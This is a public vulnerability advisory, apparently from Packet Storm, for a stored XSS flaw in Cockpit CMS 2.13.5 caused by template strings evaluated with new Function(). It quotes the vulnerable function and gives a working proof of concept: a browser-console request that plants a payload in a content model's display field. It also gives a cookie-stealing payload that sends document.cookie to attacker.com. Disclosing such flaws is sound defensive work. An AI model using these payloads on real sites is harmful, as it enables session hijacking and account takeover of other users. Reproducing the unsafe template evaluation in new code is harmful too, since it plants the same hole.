Share
## https://sploitus.com/exploit?id=PACKETSTORM:218539
*Description:* Cockpit CMS version 2.13.5 has a stored XSS in the content
    model display template. The $interpolate function in
    /modules/App/assets/js/app/utils.js uses new Function() to evaluate
    template strings, allowing arbitrary JavaScript execution. Any
    authenticated user who can edit content models can inject a payload via the
    meta.display field that fires automatically for all users visiting the
    Content page. Impact includes session hijacking, account takeover, and
    privilege escalation.
    
    Source URL: https://github.com/Cockpit-HQ/Cockpit
    Software URL: https://getcockpit.com/
    
    Vulnerable Code (/modules/App/assets/js/app/utils.js):
    
    let interpolate = function(str, params) {
        const names = Object.keys(params);
        const vals = Object.values(params);
        return new Function(...names, `return \`${str}\`;`)(...vals);
    }
    
    
    *Steps to Reproduce:*
    1. Log in to Cockpit CMS
    2. Create a content model called "testmodel" with a text field
    3. Run this in the browser console:
    
    const csrf = App.csrf;
    fetch('/content/models/save', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf },
        body: JSON.stringify({
            model: {
                name: 'testmodel',
                type: 'collection',
                meta: { display: "${document.title='XSS_CONFIRMED_' +
    document.domain}" }
            },
            isUpdate: true
        })
    });
    
    4. Visit /content - the browser tab title changes to
    "XSS_CONFIRMED_localhost"
    
    Cookie theft payload: ${fetch('https://attacker.com/?cookie=' +
    document.cookie)}
    
    
    *Impact:*- Stored XSS fires automatically, no user interaction needed
    - Session cookies have no HttpOnly flag, allowing theft
    - Content editor can escalate to admin
    
    
    *Disclosure Timeline:*- Vendor contacted, no response received
    - 2026-04-07 Public disclosure to packetstorm